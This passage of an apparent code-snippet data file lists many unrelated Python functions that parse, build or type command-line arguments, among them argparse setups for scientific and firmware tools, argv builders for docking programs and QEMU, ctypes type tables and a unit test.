= len(expectedTypes)\n\tif (numComLineArgs - 1 == len(expectedTypes)):\n\t\ttry:\n\t\t\tfor i in range(0, numExpected):\n\t\t\t\tif (expectedTypes[i] == typeInt):\n\t\t\t\t\targs.append(int(sys.argv[i+1]))\n\t\t\t\telif (expectedTypes[i] == typeFloat):\n\t\t\t\t\targs.append(float(sys.argv[i+1]))\n\t\t\t\telif (expectedTypes[i] == typeString):\n\t\t\t\t\targs.append(sys.argv[i+1])\n\t\texcept ValueError:\n\t\t\tprint (\"expected number of command line arguments found but there is type mis match\")\n\t\t\tsys.exit(1)\n\telse:\n\t\tprint (\"expected number of command line arguments not found\")\n\t\tprint (usage)\n\t\tsys.exit(1)\n\treturn args", "def get_check_types():", "def generate_python_argument_types(argtypes: Union[List, str], outdir: str, prefix: str = 'sc', types=None):\n if type(argtypes) is str:\n argtypes = json.load(open(argtypes, 'r'))\n if not os.path.exists(outdir):\n os.mkdir(outdir)\n type_to_args = collections.defaultdict(set)\n for arg in argtypes:\n argtype = argtypes[arg]\n if types is not None:\n if argtype not in types:\n continue\n type_to_args[argtype].add(arg)\n for argtype in type_to_args:\n real_args = sorted(list(type_to_args[argtype]))\n arguments_to_python(real_args, argtype, outdir, prefix)", "def _create_args(self, func_args):\n self.llvm_ret_type = self._from_ctype(self.signature.ret_type)\n self.llvm_arg_types = \\\n [self._from_ctype(a) for a in self.signature.arg_ctypes]", "def get_arg_types(header):\n data_types = [param.dataType for param in header.params]\n\n if not data_types:\n return ArgType.Empty\n elif len(set(data_types)) > 1 or all(data_type == SSE.DUAL for data_type in data_types):\n return ArgType.Mixed\n elif all(data_type == SSE.STRING for data_type in data_types):\n return ArgType.String\n elif all(data_type == SSE.NUMERIC for data_type in data_types):\n return ArgType.Numeric\n else:\n return ArgType.Undefined", "def command_preparation(wrapped, func, **kwargs_c):\n wrapped.result_type = kwargs_c['result_type']\n (args, varargs, keywords, defaults) = inspect.getargspec(func)\n wrapped.__dict__['arguments'] = []\n wrapped.__dict__['arguments_type'] = {}\n wrapped.__dict__['function_name'] = func.__name__\n wrapped.__dict__['choices'] = {}\n for name_arg in filter(lambda x: x in kwargs_c, args):\n wrapped.choices[name_arg] = kwargs_c[name_arg]\n bias = 1 if 'self' in args else 0 # if first arg is self, see from second\n for index, name in enumerate(args[bias:]):\n wrapped.arguments.append((name, defaults[index]))\n wrapped.arguments_type[name] = utils.get_command_argument_type(defaults[index])", "def dev_args(devnames):\n devc = len(devnames)\n devnames_type = ctypes.c_char_p * devc\n devnames_arg = devnames_type()\n for idx, val in enumerate(devnames):\n devnames_arg[idx] = (val + chr(0)).encode('ascii')\n return ctypes.c_int(devc), ctypes.cast(\n devnames_arg, ctypes.POINTER(ctypes.c_char_p)\n )", "def _type_def_helper(name, args, env: Env) -> typing.Tuple[Basic, typing.Dict[str, Undecided]]:\n\n new_basic = make_basic(name)\n env.set_named_type(name, new_basic)\n _ty_args = OrderedDict((arg, Undecided()) for arg in args)\n env.undecided_types.update(_ty_args)\n return new_basic, _ty_args", "def arg_type(self):\n\n arg_type = self.ctype\n\n if 'int' in arg_type:\n arg_type = 'int'\n\n if self.is_list:\n arg_type = 'list of {}'.format(arg_type)\n\n if 'required' in self.qualifiers:\n arg_type = \"{}, optional\".format(arg_type)\n\n return arg_type", "def parse_arguments(args):", "def definearguments(self, customparser):\r\n if not customparser:\r\n return\r\n\r\n self.cmdbase.add_login_arguments_group(customparser)\r\n\r\n customparser.add_argument(\r\n \"--fulltypes\",\r\n dest=\"fulltypes\",\r\n action=\"store_true\",\r\n help=\"Optionally include this flag if you would prefer to \"\r\n \"return the full type name instead of the simplified versions\"\r\n \" (Redfish only option).\",\r\n default=None,\r\n )", "def _RegisterInputs(self):\n args = []\n for source in ['FcA', 'FcB']:\n gps_type = self._gps_type_per_source[source]\n if gps_type == 'Septentrio':\n args += [\n self._Arg('SeptentrioSolution', source, 'pvt_cartesian.x'),\n self._Arg('SeptentrioSolution', source, 'pvt_cartesian.y'),\n self._Arg('SeptentrioSolution', source, 'pvt_cartesian.z'),\n self._Arg('SeptentrioSolution', source, 'pvt_cartesian.mode'),\n self._Arg('SeptentrioSolution', source,\n 'pvt_cartesian.timestamp.tow'),\n ]\n elif gps_type == 'NovAtel':\n args += [\n self._Arg('NovAtelSolution', source, 'best_xyz.pos_x'),\n self._Arg('NovAtelSolution', source, 'best_xyz.pos_y'),\n self._Arg('NovAtelSolution', source, 'best_xyz.pos_z'),\n self._Arg('NovAtelSolution', source, 'best_xyz.pos_type'),\n self._Arg('NovAtelSolution', source, 'best_xyz.timestamp.tow'),\n ]\n else:\n assert False\n return args", "def fill_args(cls, toolchain, parser):\n pass # pass must be overloaded (if required)", "def generateArgsList(self, I1, I2, O1, O2, O3, N, M, S, C ):\n ArgsList = [ \n \"-n\", str(N), \n # \"-m\", str(M), \n # \"-s\", str(S), \n \"-c\", str(C), \n ]\n if I1 > 0 or I2 > 0:\n if I1 > 0:\n ArgsList.append(\"-i1\")\n ArgsList.append(str(I1)) \n if I2 > 0:\n ArgsList.append(\"-i2\")\n ArgsList.append(str(I2))\n else: \n ArgsList.append(\"--noinput\")\n \n if O1 > 0 or O2 > 0 or O3 > 0:\n if O1 > 0:\n ArgsList.append(\"-o1\")\n ArgsList.append(str(O1)) \n if O2 > 0:\n ArgsList.append(\"-o2\")\n ArgsList.append(str(O2))\n if O3 > 0:\n ArgsList.append(\"-o3\")\n ArgsList.append(str(O3))\n else: \n ArgsList.append(\"--nooutput\")\n \n ArgsList.append(\"--nosummary\")\n ArgsList.append(\"--verbose\")\n return ArgsList", "def convert_dial_attrs_args(attrs, args):\n if attrs == None:\n attrs = {}\n attrs_list = [\"%s=%s\" % (k, v) for k, v in attrs.items()]\n if args == None:\n args = []\n c_attrs = list_of_strings_to_c_string_array(list(attrs_list)+[None])\n c_argv = list_of_strings_to_c_string_array(list(args)+[None])\n return c_attrs, c_argv", "def get_arguments():\n\tparser.add_argument('-i', '--interface', help='interface to affect')\n\tparser.add_argument('-m','--mac', help='mac to allocate')\n\n\targs = parser.parse_args()\n\tinterface = args.interface\n\tmac = args.mac\n\treturn (interface, mac)", "def get_cmd_args():\n\n\n\t#Creates the Argument Parser\n\tparser = ArgumentParser(description = \"ID Lab qPCR Analysis v\" + VERSION + \" \" + QUALITY)\n\n\t#Adds the input file argument\n\tparser.add_argument('-f', '--file',\n\t\t\t\tnargs = '+',\n\t\t\t\ttype = FileType('r'),\n\t\t\t\trequired = True)\n\n\t#Adds the output directory\n\tparser.add_argument('-o', '--output',\n\t\t\t\trequired = True)\n\n\t#Adds the model argument, to select between the three models\n\tparser.add_argument('-m', '--mod', '--model',\n\t\t\t\tnargs = '?',\n\t\t\t\tchoices = ['relative', 'absolute', 'stability'],\n\t\t\t\trequired = True)\n\n\t#Adds the control genes argument, taking a list of gene names\n\tparser.add_argument('-cg', '--cgenes', '--controlgenes',\n\t\t\t\tnargs = '+',\n\t\t\t\trequired = True)\n\n\t#Adds the optional control sample argument for the stability model, taking a list of sample names\n\tparser.add_argument('-cs', '--csample', '--controlsamples',\n\t\t\t\tnargs = '*')\n\n\t#Adds optional outlier cutoff\n\tparser.add_argument('-oc', '--ocutoff',\n\t\t\t\ttype = float,\n\t\t\t\tdefault = 0.3)\n\n\t#Adds optional max outliers\n\tparser.add_argument('-om', '--omax',\n\t\t\t\ttype = float,\n\t\t\t\tdefault = 0.5)\n\n\t#Adds optional encoding \n\tparser.add_argument('-e', '--encoding',\n\t\t\t\tdefault = 'ISO-8859-1')\n\n\t#Adds optional header size\n\tparser.add_argument('-hd', '--header',\n\t\t\t\tdefault = 47)\n\n\treturn vars(parser.parse_args())", "def make_args(port, n, t, population, test=None, value=0, failure=None, tx_rate=0, loglevel=logging.INFO, output=None,\n broadcast=True, fan_out=10, profile=None, validate=False, ignore_promoter=False):\n res = [str(port), str(n), str(t), str(population)]\n\n if test is not None:\n res.append('--test')\n res.append(test)\n\n res.append('--value')\n res.append(str(value))\n\n if failure is not None:\n res.append('--failure')\n res.append(failure)\n\n res.append('--tx-rate')\n res.append(str(tx_rate))\n\n if loglevel == logging.DEBUG:\n res.append('--debug')\n elif loglevel == logging.INFO:\n res.append('-v')\n\n # None represents stdout\n if output is not None:\n res.append('-o')\n res.append(output)\n\n if broadcast:\n res.append('--broadcast')\n\n res.append('--fan-out')\n res.append(str(fan_out))\n\n if profile:\n res.append('--profile')\n res.append(profile)\n\n if validate:\n res.append('--validate')\n\n if ignore_promoter:\n res.append('--ignore-promoter')\n\n return res", "def universal_args(self):\n args = list(self.BASIC_ARGS)\n # Set ATF to be the bios\n args += [\"-bios\", \"%s/bl1.bin\" % self.config.atf]\n\n if self.config.linux:\n args += [\n \"-kernel\",\n \"%s/arch/arm64/boot/Image\" % self.config.linux\n ]\n args += [\"-append\", self.LINUX_ARGS]\n\n if self.config.android:\n args += self.android_drives_args()\n\n return args", "def create_arg_list(self):\n\n sim = self.sim\n\n py_kernel_args = sim.kernel_args # Python variables that are passed into the kernel\n gen_kernel_args = sim.ctx_info['kernel_arguments'] # A list of needed kernel arguments from kernel autogen (Mako)\n\n list_for_kernel = gen_kernel_args[self.short_name]\n\n python_args_needed = [z[0] for z in list_for_kernel]\n\n self.arg_list = [py_kernel_args[z] for z in python_args_needed]\n\n # Loop over the arg_list...if the argument is a function, call it!\n for i in range(len(self.arg_list)):\n value = self.arg_list[i]\n if inspect.isfunction(value):\n self.arg_list[i] = value()\n\n additional_cl_args = [sim.queue, self.kernel_global_size, self.kernel_local_size]\n\n self.arg_list = additional_cl_args + self.arg_list", "def get_argdict(cls, toolchain, args):\n return {} # Empty must be overloaded (if required)", "def build_argv(software: str, receptor: str, ligand: str,\n center: Tuple[float, float, float],\n size: Tuple[int, int, int] = (10, 10, 10),\n ncpu: int = 1, name: Optional[str] = None, path: str = '.',\n extra = Optional[List[str]]) -> Tuple[List[str], str, str]:\n if software not in {'vina', 'smina', 'psovina', 'qvina'}:\n raise ValueError(f'Invalid docking program: \"{software}\"')\n\n path = Path(path)\n if not path.is_dir():\n path.mkdir(parents=True)\n\n name = name or (Path(receptor).stem+'_'+Path(ligand).stem)\n extra = extra or []\n\n out = path / f'{software}_{name}_out.pdbqt'\n log = path / f'{software}_{name}_log.txt'\n \n argv = [\n software, f'--receptor={receptor}', f'--ligand={ligand}',\n f'--center_x={center[0]}',\n f'--center_y={center[1]}',\n f'--center_z={center[2]}',\n f'--size_x={size[0]}', f'--size_y={size[1]}', f'--size_z={size[2]}',\n f'--cpu={ncpu}', f'--out={out}', f'--log={log}', *extra\n ]\n\n return argv, out, log", "def get_command_line_args(argv):\n # Initialize the arguments to their default values \n\n args = {'startdate': '20200101',\n 'enddate': '20200102',\n 'outfile': 'test.nc',\n 'dt': 5,\n 'real': True,\n 'south': False,\n 'tcv': False,\n 'substorm': False,\n 'ions': False,\n 'move': False,\n 'cusp': False}\n\n arg_type = {'startdate': str,\n 'enddate': str,\n 'outfile': str,\n 'dt': float,\n 'real': bool,\n 'south': bool,\n 'tcv': bool,\n 'substorm': bool,\n 'ions': bool,\n 'move': bool,\n 'cusp': bool}\n \n # If there is input, set default help to False\n args['help'] = False if len(argv) > 0 else True\n \n # Cycle through all arguments except the first, saving input\n for arg in argv:\n # Treat the file list and formatting seperately\n if arg.find('-') == 0:\n # This is not a filename, remove the dash to get the key\n split_arg = arg.split('=')\n akey = split_arg[0][1:]\n # Get the argument value as the desired type\n if akey not in arg_type.keys():\n raise ValueError(''.join(['unknown command line input, ',\n arg, ', try -help for details']))\n\n if len(split_arg) == 1:\n if arg_type[akey] == bool:\n arg_val = True\n else:\n raise ValueError('expected equality after flag {:}'.format(\n akey))\n else:\n if arg_type[akey] == int:\n arg_val = int(split_arg[1])\n elif arg_type[akey] == float:\n arg_val = float(split_arg[1])\n elif arg_type[akey] == str:\n arg_val = split_arg[1]\n else:\n # This is boolean input\n arg_val = bool_string(split_arg[1])\n\n args[akey] = arg_val\n \n return args", "def get_arg(instruction, itype):\n\n if itype == itypes.family_code:\n return instruction[7:2]\n elif itype == itypes.opcode:\n return instruction[7:]\n elif itype == itypes.funct3:\n return instruction[15:12]\n elif itype == itypes.funct7:\n return instruction[32:25]\n elif itype == itypes.rs1:\n return instruction[20:15]\n elif itype == itypes.rs2:\n return instruction[25:20]\n elif itype == itypes.imm12lo:\n return concat(instruction[32], instruction[7], instruction[31:27])\n elif itype == itypes.imm12hi:\n return concat(instruction[27:25], instruction[12:8])\n elif itype == itypes.instruction_id:\n return instruction[15:12]\n elif itype == itypes.rd:\n return instruction[12:7]\n elif itype == itypes.imm12:\n return instruction[32:20]\n elif itype == itypes.imm12_sb:\n return concat(instruction[32:25], instruction[12:7])\n elif itype == itypes.imm20:\n return concat(instruction[31], instruction[20:12], instruction[20], instruction[31:21])\n elif itype == itypes.imm20_pc:\n return instruction[31:12]\n elif itype == itypes.shamtw:\n return instruction[25:20]\n elif itype == itypes.shamt:\n return instruction[25:20]\n else:\n return None", "def get_init_arguments_and_types(cls) -> List[Tuple[str, Tuple, Any]]:\n trainer_default_params = inspect.signature(cls).parameters\n name_type_default = []\n for arg in trainer_default_params:\n arg_type = trainer_default_params[arg].annotation\n arg_default = trainer_default_params[arg].default\n try:\n arg_types = tuple(arg_type.__args__)\n except AttributeError:\n arg_types = (arg_type,)\n\n name_type_default.append((arg, arg_types, arg_default))\n\n return name_type_default", "def convert_arg((arg, attrs, mode, typ, name)):\n iorname = name\n return iorname, (arg, attrs, mode, typ, name)", "def get_args():\n args_obj = None\n parser = argparse.ArgumentParser(description='This tool is for installing mellanox-os')\n parser.add_argument('-s', '--switch-name', help='Switch name to connect', required=True)\n parser.add_argument('-u', '--switch-username', help='Switch name to connect', default='admin')\n parser.add_argument('-sp', '--switch-password', help='Switch name to connect', default='admin')\n parser.add_argument('-i', '--switch_ip', help='Switch ip to connect')\n parser.add_argument('-b', '--install', action='store_true', help='Install mellanox-os')\n parser.add_argument('-d', '--fetch', action='store_true', help='fetch mellanox-os')\n parser.add_argument('-f', '--force', action='store_true', help='force fetch and install')\n\n parser.add_argument('-l', '--image-path', help='image path location')\n parser.add_argument('-n', '--image-name', help='image name')\n\n parser.add_argument('-m', '--master-ip', help='master ip to fetch the image from')\n parser.add_argument('-p', '--master-password', help='master password to connect from the switch')\n parser.add_argument('-v', '--verbosity', help='increase output verbosity')\n\n try:\n args_obj = parser.parse_args()\n if args_obj.install is True and args_obj.image_name is None:\n parser.error('--install can only be used when image-path and image-name are provided.')\n if args_obj.fetch is True and args_obj.master_ip is None or args_obj.master_password is None or\\\n args_obj.image_path is None:\n parser.error('--fetch can only be used when master-ip and master-password are provided.')\n\n except IOError as exc:\n parser.error(str(exc))\n return args_obj", "def do_command(self, args):\n ostypeops = dbops.OsTypes()\n ostypeops.add(args)", "def parseCMDParam():\n\n progName = sys.argv[0]\n\n progName = extractFileName(progName)\n\n format = \"python \" + progName + \" [-h] -b binary_path -p hardware_platform -k private_key_path -x bootloader_hex_file_path\"\n\n example1 = \"\\t get help: \\n\" + \"\\t\\tpython \" + progName + \" -h\"\n\n example2 = \"\\t use inputImage.bin, MCHP-Curiosity-PIC32MZEF, private_key.pem , aws_bootloader.X.production.hex as parameter : \\n\" \\\n + \"\\t\\tpython \" + progName + \" -b inputImage.bin -p MCHP-Curiosity-PIC32MZEF -k private_key.pem -x aws_bootloader.X.production.hex\"\n\n usageMsg = format + \"\\n\\n\" + \"example usages:\" + \"\\n\" + example1 + \"\\n\" + example2\n\n parser = argparse.ArgumentParser(usage=usageMsg)\n\n parser.add_argument('-b', required=True, help=\" path of input binary image \")\n parser.add_argument('-p', required=True, help=\" hardware platform name \")\n parser.add_argument('-k', required=True, help=\" path of the private key used to sign the image \")\n parser.add_argument('-x', required=True, help=\" path of the bootloader hex file \")\n\n args = vars(parser.parse_args())\n\n inputImagePath = args[\"b\"]\n\n hardwarePlatform = args[\"p\"]\n\n privateKeyPath = args[\"k\"]\n\n bootloaderHexPath = args[\"x\"]\n\n return inputImagePath, hardwarePlatform, privateKeyPath, bootloaderHexPath", "def define_parameters(parser):\n parser.add_argument(\"--bson\", help=\"If the language supports add bson tags or bson representation to the structure\", action=\"store_true\")\n parser.add_argument(\"--csv\", help=\"If the language supports add CSV tags or CSV representation to the structure\", action=\"store_true\")\n parser.add_argument(\"--db\", help=\"adds db tags to Go structs.\" , action=\"store_true\")\n parser.add_argument(\"--input\", default=\"\", help=\"the path to the input CSV file\",type=str )\n parser.add_argument(\"--input-dir\", default=\"\", help=\"the path to the directory that contains the CSV files to parse\",type=str )\n parser.add_argument(\"--json\", help=\"If the language supports add JSON tags or JSON representation to the structure\", action=\"store_true\")\n parser.add_argument(\"--package\", help=\"sets the package to the correct name for Go structs\", action=\"store_true\")\n parser.add_argument(\"--language\", choices=[LANG_GO], default=LANG_GO, help=\"create language specific data structures\", required=True, type=str)\n parser.add_argument(\"--name\", help=\"name of the data structure being created\", type=str)\n parser.add_argument(\"--output-dir\", help=\"the directory where the generated file should be written. If not provided file will be written to stdout\")\n parser.add_argument(\"--verbose\", help=\"more output during the parsing and creation of the data structures\", action=\"store_true\")", "def args_str(self):", "def _get_add_package_args(self, package, type_option, version_option):\n raise NotImplementedError()", "def __init__(self, *args):\n self.types = tuple([trait_from(arg) for arg in args])\n self.fast_validate = (9, self.types)", "def _getargs(fn_sig):\n params = fn_sig.parameters\n args = []\n for k, v in params.items():\n if (v.kind & v.POSITIONAL_OR_KEYWORD) == v.POSITIONAL_OR_KEYWORD:\n args.append(k)\n else:\n msg = \"%s argument type unsupported in jitclass\" % v.kind\n raise errors.UnsupportedError(msg)\n return args", "def get_set_platform_temperature_args(self,comArgs):\n params, flags = self.get_params(comArgs)\n temp = params.get('S') \n tool = params.get('T')\n args = [temp,tool] \n return args", "def validate_args(self, in_args, cmd_call):\n valid_1, valid_2 = None, None\n\n if len(in_args) > 0 and type(in_args) is not list:\n args = in_args.split()\n valid_1 = args[0]\n elif type(in_args) is list and len(in_args) > 0:\n args = in_args\n valid_1 = args[0]\n else:\n args = []\n\n if cmd_call in ['default']:\n # Default : Returns a valid cui type for an input cui\n # checks to see if there is more than 2 arguments\n # if so, arg[0] may be a valid code\n # arg[1] may be a valid code type\n # if not ask the user what type of code type arg[0] is\n # valid_1 = valid cui type\n # valid_2 = None\n while True:\n if len(args) >= 2 and len(args) <= 3:\n input_type = args[1].upper()\n else:\n input_type = input(\"What type of id is '{0}'? [LOCAL/RXCUI/NDC/SNOMED]\".format(args[0])).upper()\n\n # Confirm it's a valid code type\n valid_type = self.validate_id_type(input_type)\n # Valid type is a boolean of True\n if isinstance(valid_type, str) or valid_type is None:\n return None\n elif valid_type:\n break\n elif not valid_type:\n print('Invalid Option, Please Try Again')\n continue\n valid_1 = input_type\n\n elif cmd_call in self.cmd_config_default:\n # valid_1 : Valid Cui , valid_2 : Valid Cui Type\n valid_2, _ = self.validate_args(args, 'default')\n valid_1 = args[0]\n\n elif cmd_call == 'code_lookup':\n # args[0] : Initial CUI, args[1] : Initial CUI Type, args[2] : Target CUI Type\n # valid_1 : valid cui, valid_2 : list valid source and target\n _dict_opts = util.OPTIONS_CUI_TYPES.copy()\n _avail = list(set(smores.get_dict_sources()) & set(_dict_opts))\n if len(_avail) == 0 and len(args) < 2:\n print('There are no available starting cui types that can be crosswalked.\\n'\n 'Please load a file containing valid cui types: {0}'.format(_dict_opts))\n return False, None\n\n if len(args) >= 2:\n if len(args) == 3:\n # provided cui, cui source, and target\n valid_2, _ = self.validate_args(args, 'default')\n source, target = args[1].upper(), args[2].upper()\n else:\n source, target = args[0].upper(), args[1].upper()\n valid_1 = simple_input(\"Is {0} the correct starting source? \".format(source), ['YES', 'NO', 'exit'])\n if valid_1 == 'exit':\n return False, None\n # TODO need path for valid_2\n else:\n valid_1 = simple_input(\"Which code set do you want to start with?\", _avail)\n if valid_1 != 'exit':\n _dict_opts.remove(valid_1) # Don't lookup what we've already got\n valid_2 = simple_input(\"Which code set do you want to get results for?\", _dict_opts)\n if valid_2 == 'exit':\n return False, None\n else:\n return False, None\n\n elif cmd_call == 'errors':\n _current_err = list(self.errors.keys())\n if len(args) > 1:\n smores_error('#Cx001.7', console_p=True)\n return\n elif len(args) == 1 and args[0].lower() in _current_err:\n valid_1 = args[0]\n elif len(args) == 1:\n print('There are currently no errors logged for that command.')\n return\n else:\n valid_1 = simple_input(\"Please choose a command from the list to see errors: \", _current_err)\n\n elif cmd_call in ['csv', 'remap', 'fhir', 'json']:\n # Format: [File] [Output]\n if not self.inputs['loaded']:\n print(\"No Files Loaded!\\nYou Must load a file containing local medications first\")\n else:\n _file_opts = list(self.inputs['files'].keys()) + ['All']\n _dict_opts = list(smores.get_dict_sources(True)) #+ ['All']\n _file_or_dict = None\n\n if cmd_call in ['csv', 'json']:\n if len(args) == 0:\n _file_or_dict = simple_input(\"Do you want results for a File or a constructed Dictionary?\",\n ['File', 'Dictionary', 'exit'], True)\n elif args[0] not in _file_opts and args[0] not in _dict_opts:\n print('That option was not recognized as a valid source.')\n _file_or_dict = simple_input(\"Do you want results for a File or a constructed Dictionary?\",\n ['File', 'Dictionary', 'exit'], True)\n else:\n valid_1 = args[0]\n\n if _file_or_dict.upper() == 'FILE':\n valid_1 = 'FILE|' + simple_input(\"Please choose a loaded file\", _file_opts, True)\n\n elif _file_or_dict.upper() == 'DICTIONARY':\n valid_1 = 'DICT|' + simple_input(\"Please choose a code dictionary to output\", _dict_opts, True)\n elif _file_or_dict.upper() == 'EXIT':\n return None, None\n\n else:\n valid_1 = simple_input(\"Please choose a loaded file\", _file_opts, True)\n\n if cmd_call in ['csv', 'json', 'fhir']:\n if len(args) == 2 and len(args[1]) > 0:\n valid_2 = args[1]\n else:\n valid_2= input(\"Please provide an output file name:\").strip()\n\n if len(valid_2) > 0:\n if \".\" in valid_2:\n valid_2, ext = valid_2.split(\".\")\n else:\n valid_2 = ''\n print('Empty file name provided, using default.')\n else:\n valid_2 = args[0]\n\n elif cmd_call == 'file':\n re_use = False\n if self.inputs['loaded'] and len(in_args) == 0:\n print(\"The following file(s) have already been loaded: \\n\" + str(self.inputs['files']))\n _load_more = simple_input(\"Would you like to load an additional file?\", ['Y', 'N', 'exit'])\n if _load_more == 'Y':\n pass\n elif _load_more == 'N':\n _re_use = simple_input(\"Would you like to re-use a loaded file?\", ['Y', 'N', 'exit'])\n if _re_use == 'Y':\n re_use = True\n else:\n return False, None\n else:\n return False, None\n\n if in_args is not None and len(in_args) > 0:\n valid_1 = in_args\n else:\n valid_1 = input(\"Please enter the name of the file to load: \") if not re_use else simple_input(\n 'Select the file to be used: ', list(self.inputs['files'].keys()), index=True)\n\n while True:\n if valid_1 in self.inputs['files']:\n if not re_use:\n print(\"It looks like you've already loaded that file. Please try a different file.\")\n valid_1, valid_2 = input(\"Please enter the name of the file to load: \")\n else:\n break\n elif len(valid_1) == 0:\n smores_error('#Cx001.7', logger=smoresLog)\n valid_1, valid_2 = input(\"Please enter the name of the file to load: \")\n else:\n break\n\n if not resolve_target_path(valid_1):\n valid_1, valid_2 = self.validate_args('', 'file')\n\n elif '.smr' in valid_1:\n if len(self.inputs['files']) > 0:\n print(\n 'It looks like you are trying to load a session, this will replace the current session and '\n 'all previous work.')\n _save = simple_input('Do you want to save the current session first?', ['Y', 'N', 'EXIT'])\n if _save == 'Y':\n smores.save_session(self.__version__)\n elif _save == 'EXIT':\n return False, None\n valid_2 = 'session'\n else:\n valid_2 = 'file'\n\n smoresLog.debug('Args: {0}, Validated as: {1}'.format(valid_1, valid_2))\n return valid_1, valid_2", "def setup_cmd_args():\n parser = argparse.ArgumentParser(description=\"This program will query G-POD and COPHUB on the same datasets, in order to obtain the number of data results, compare them compile a report with the differences.\", formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n # parser.add_argument(\"root_dir\", help=\"The root directory containing data to check\")\n # parser.add_argument(\"--workspace\", help=\"Set Workspace manually\")\n parser.add_argument(\"--outputlist\", help=\"Folder to write the output lists with the un-synced products.\", default=\"c:\\\\temp\\\\\")\n parser.add_argument(\"--daysback\", help=\"Report with a given number of days back from today\", default=0)\n parser.add_argument(\"--dataset\", help=\"Set which dataset to query (chose S3A_SR_1_SRA_A_PREOPS or S3B_SR_1_SRA_A_NTC)\")\n parser.add_argument(\"--startdate\", help=\" The Start Date (format: YYYY-MM-DD) \", default=\"2016-06-01\")\n parser.add_argument(\"--enddate\",help=\" The End Date (format: YYYY-MM-DD)\")\n parser.add_argument(\"--cphubuser\",help=\"COPHUB username\", required=True)\n parser.add_argument(\"--cphubpw\",help=\"COPHUB password\", required=True)\n parser.add_argument(\"-email\", type=str, help=\"Email to send the results\", action=\"append\")\n parser.add_argument('-t', action='store_true', help=\"Today as enddate. Otherwise the last day of the previous month is considered.\")\n parser.add_argument('-n', action='store_true', help=\"Normal numeric check\")\n parser.add_argument('-m', action='store_true', help=\"Monthly check with product listing.\")\n return parser.parse_args()", "def initialize_types():\n global VOID, VOID_P, VOID_PP\n global CHAR, CHAR_P, CHAR_PP\n global INT, INT_P, INT_108A\n global ULONG, UINT\n \n VOID = gdb.lookup_type(\"void\")\n VOID_P = VOID.pointer()\n VOID_PP = VOID_P.pointer()\n \n CHAR = gdb.lookup_type(\"char\")\n CHAR_P = CHAR.pointer()\n CHAR_PP = CHAR_P.pointer()\n \n INT = gdb.lookup_type(\"int\")\n INT_P = INT.pointer()\n INT_108A = INT.array(108)\n\n UINT = gdb.lookup_type(\"unsigned int\")\n ULONG = gdb.lookup_type(\"unsigned long\")", "def __set_utils_types(self):\n self.__arrayt = type(self.c_byte * 1)\n # self.__cfuncptrt = type(type(self.memmove))\n # class _p(self.Structure):\n # pass\n # self.__ptrt = type(self.POINTER(_p))\n self.__basic_types_name = {\n 'c_bool': '?',\n 'c_char': 'c',\n 'c_byte': 'b',\n 'c_ubyte': 'B',\n 'c_short': 'h',\n 'c_ushort': 'H',\n 'c_int': 'i', # c_int is c_long\n 'c_uint': 'I',\n 'int': 'i',\n 'c_longlong': 'q',\n 'c_ulonglong': 'Q',\n 'c_float': 'f',\n 'c_double': 'd',\n 'c_longdouble': 'g',\n 'c_char_p': 's',\n 'c_void_p': 'P',\n # 'c_void': 'P', ## void in array is void_p ##DEBUG\n }\n if self.__longsize == 4:\n # long == int\n self.__basic_types_name.update({'c_long': 'i',\n 'c_ulong': 'I',\n 'long': 'i',\n 'c_void': 'I'})\n elif self.__longsize == 8:\n # long == longlong\n self.__basic_types_name.update({'c_long': 'q',\n 'c_ulong': 'Q',\n 'long': 'q',\n 'c_void': 'Q'})\n # we need to account for the possible changes in c_longdouble\n self.__basic_types = set([getattr(self, k) for k in self.__basic_types_name.keys() if hasattr(self, k)])\n return", "def parse_cmd_args():\n parser = argparse.ArgumentParser(description='This program applies an RL method to an OpenAI gym environment')\n for name, val in config1.items():\n if type(val) is bool:\n parser.add_argument('--' + name, action='store_true', dest=name)\n parser.add_argument('--not_' + name, action='store_false', dest=name)\n parser.set_defaults(**{name: val})\n else:\n parser.add_argument('--' + name, type=type(val), default=val)\n\n args = parser.parse_args()\n return args", "def _get_commander_args(function_name, data,\n working_dir,\n num_workers,\n shared_lib='./libdml_toolkits.so',\n cluster_type='standalone_passive',\n output_name='out',\n **kwargs):\n args = dict()\n # from arguments\n args['function'] = function_name\n args['args'] = data\n args['num_nodes'] = num_workers\n args['working_dir'] = _make_internal_url(working_dir)\n\n # from optional arguments\n args['shared_lib'] = shared_lib\n args['cluster_type'] = cluster_type\n args['output_name'] = output_name\n\n # from kwargs, could overwrite existing args\n accepted_args = list(args.keys()) + ['check_hdfs', 'startup_timeout',\n 'metric_server_address_file',\n 'metric_server_port']\n for key in accepted_args:\n if key in kwargs:\n args[key] = kwargs[key]\n\n # return a formated list\n return ['--%s=%s' % (k, v) for k, v in args.items()]", "def test1SetBuiltinTypes( self ):\n\n from AthExHelloWorld.AthExHelloWorldConf import HelloAlg\n\n HelloWorld = HelloAlg( 'HelloWorld' )\n\n HelloWorld.MyInt = 42\n HelloWorld.MyBool = True\n HelloWorld.MyDouble = 3.14159\n HelloWorld.MyStringVec = [ \"Welcome\", \"to\", \"Athena\", \"Framework\", \"Tutorial\" ]\n HelloWorld.MyStringVec += [ \"!\" ]\n HelloWorld.MyDict = { 'Bonjour' : 'Guten Tag',\n 'Good Morning' : 'Bonjour' , 'one' : 'uno' }\n HelloWorld.MyDict[ \"Goeiedag\" ] = \"Ni Hao\"\n HelloWorld.MyTable = [ ( 1 , 1 ) , ( 2 , 4 ) , ( 3 , 9 ) ]\n HelloWorld.MyTable += [ ( 4, 16 ) ]\n HelloWorld.MyMatrix = [ [ 1, 2, 3 ],\n [ 4, 5, 6 ] ]\n HelloWorld.MyMatrix += [ [ 7, 8, 9 ] ]\n\n HelloWorld.setup()\n\n self.assertEqual( HelloWorld.MyInt, 42 )\n self.assertTrue( JobOptionsSvc.verify( 'HelloWorld', 'MyInt', '42' ) )\n\n self.assertEqual( HelloWorld.MyBool, True )\n self.assertTrue( JobOptionsSvc.verify( 'HelloWorld', 'MyBool', 'True' ) )\n\n self.assertEqual( round( HelloWorld.MyDouble - 3.14159, 8 ), 0. )\n self.assertTrue( JobOptionsSvc.verify( 'HelloWorld', 'MyDouble', '3.14159' ) )\n\n # the following may be too sensitive to non-consequential changes in formatting\n self.assertEqual( HelloWorld.MyStringVec,\n [ \"Welcome\", \"to\", \"Athena\", \"Framework\", \"Tutorial\", \"!\" ] )\n self.assertTrue( JobOptionsSvc.verify( 'HelloWorld', 'MyStringVec',\n \"['Welcome', 'to', 'Athena', 'Framework', 'Tutorial', '!']\" ) )\n\n self.assertEqual( HelloWorld.MyDict,\n {'Bonjour': 'Guten Tag', 